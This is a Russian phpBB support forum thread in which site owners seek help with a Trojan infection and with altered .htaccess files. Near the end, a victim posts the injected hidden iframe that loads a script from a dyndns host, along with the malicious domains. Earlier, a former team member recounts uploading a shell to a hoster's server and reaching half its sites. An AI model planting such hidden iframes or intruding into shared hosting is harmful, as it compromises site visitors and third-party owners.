Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Проверил файлы — вредоносного кода нет. Да и на сайте теперь тоже ничего нет, антивирус больше не ругается. Исправилось само собой?
Любовь и боль, покой и бой я как любой несу с собой…
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Спасибо за уделенное внимание, но вопрос остается подвешенным - каким способом можно изменить файлы .htaccess, не затронув информацию о его дате изменения? Где дыра?
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Да кто ж его знает-то? Это только на уровне ясновидения можно узнать.
Любовь и боль, покой и бой я как любой несу с собой…
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Не. Все штатные телепаты в отпуске.
Любовь и боль, покой и бой я как любой несу с собой…
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Найдется. Как убить Трояна?
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Даже не знаю в каком направлении дальше развиваться - ясновидения или хакера-программиста?
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Я подскажу. Меняй пароли доступа к FTP и храни их в бумажнике вместо с двухдолларовой бумажкой.lesha20 писал(а):Даже не знаю в каком направлении дальше развиваться
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Re: Изменены все файлы .htaccess - уязвимость скриптов?
У меня первый случай изменения файлов .htaccess был 18.12.12, после которого я поменял все пароли - по ftp, к базе данных. Храню их в зашифрованном архиве rar. Но конечно, я часто меняю шаблоны, закачивая их через клиент FileZilla Client или ISPManager - кто-то уже успел перехватить пароли, что-ли?
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Изменены все файлы .htaccess - уязвимость скриптов?
Может у тебя на компе троян какой-нибудь, ворующий пароли. Откуда мы можем знать? Разбирайся. Анализируй.
Любовь и боль, покой и бой я как любой несу с собой…
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Проблема может быть не у тебя, а у дырявого сайта, который расположен на том же хостинге. Если через него залили шелл, например такой Интересный руткит
то могли получить доступ ко всем сайтам на этом хостинге, и даже к базам данных.
Каюсь, я экспериментировал с той штукой, и залил его на сервер одного солидного хостера, где находятся сайты известных местных предприятий и учреждений. Так вот я получил доступ к половине из них, и допустим, прочитав конфигурационные файлы, мог бы узнать оттуда пароли к базам данных, а далее... у.... чтоб я мог там натворить. Страшно самому стало, и его быстренько потер оттуда. Так вот...
то могли получить доступ ко всем сайтам на этом хостинге, и даже к базам данных.
Каюсь, я экспериментировал с той штукой, и залил его на сервер одного солидного хостера, где находятся сайты известных местных предприятий и учреждений. Так вот я получил доступ к половине из них, и допустим, прочитав конфигурационные файлы, мог бы узнать оттуда пароли к базам данных, а далее... у.... чтоб я мог там натворить. Страшно самому стало, и его быстренько потер оттуда. Так вот...
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
-
- phpBB 3.0.0 RC1
- Сообщения: 1457
- Стаж: 17 лет 4 месяца
- Откуда: Израиль, Беэр-Шева
- Благодарил (а): 28 раз
- Поблагодарили: 53 раза
Re: Изменены все файлы .htaccess - уязвимость скриптов?
А как можно "залить шелл"? Это что -- есть дырка в FTP доступе?
После нескольких лет общения здесь и техсопровождения форумов я наконец понял, что ничего не понимаю в phpBB!
-
- Former team member
- Сообщения: 12113
- Стаж: 18 лет 2 месяца
- Откуда: Калининград не Кенигсберг
- Благодарил (а): 36 раз
- Поблагодарили: 1526 раз
Re: Изменены все файлы .htaccess - уязвимость скриптов?
Борис Бердичевский
Интересный руткит
Интересный руткит
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
-
- phpBB 2.0.0
- Сообщения: 244
- Стаж: 16 лет 1 месяц
Re: Как убить Трояна?
и снова вирусня - опишу что получилось узнать.
вот эти сайты левые при загрузке страницы подгружабтся
brsoftech.in
startinfobb.dyndns.info
вот с этого сайта house.404.mn/images/pay6_bg.jpg картинка подгружается с надписью @site content security@ + поле ввода телефона и кнопкой отправить.
яндекс вебмастер выдает зараженные страницы
сайт/viewtopic.php?f=
сайт/index.php
если сайт статичный, то страницы html
к сожалению - это все что удалось пока найти на эту заразу. никаких iframe нет в этих фалах и ссылок написанных выше тоже.
Если кто то имеет представление как найти, напишите.
Добавлено спустя 8 минут 20 секунд:
Вроде как такой код у этой штуки
вот эти сайты левые при загрузке страницы подгружабтся
brsoftech.in
startinfobb.dyndns.info
вот с этого сайта house.404.mn/images/pay6_bg.jpg картинка подгружается с надписью @site content security@ + поле ввода телефона и кнопкой отправить.
яндекс вебмастер выдает зараженные страницы
сайт/viewtopic.php?f=
сайт/index.php
если сайт статичный, то страницы html
к сожалению - это все что удалось пока найти на эту заразу. никаких iframe нет в этих фалах и ссылок написанных выше тоже.
Если кто то имеет представление как найти, напишите.
Добавлено спустя 8 минут 20 секунд:
Вроде как такой код у этой штуки
Код: Выделить всё
<iframe width="2" height="2" frameborder="0"src="http://startinfobb.dyndns.info/statb.php?i=22516">
<html>
<head>
<body>
</html>
</iframe>
Последний раз редактировалось fanatic 25.02.2013 11:51, всего редактировалось 1 раз.
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Как убить Трояна?
А если вот эту фразу на русский язык перевести, то как она будет выглядеть?вот с этого картинка поля берется
Любовь и боль, покой и бой я как любой несу с собой…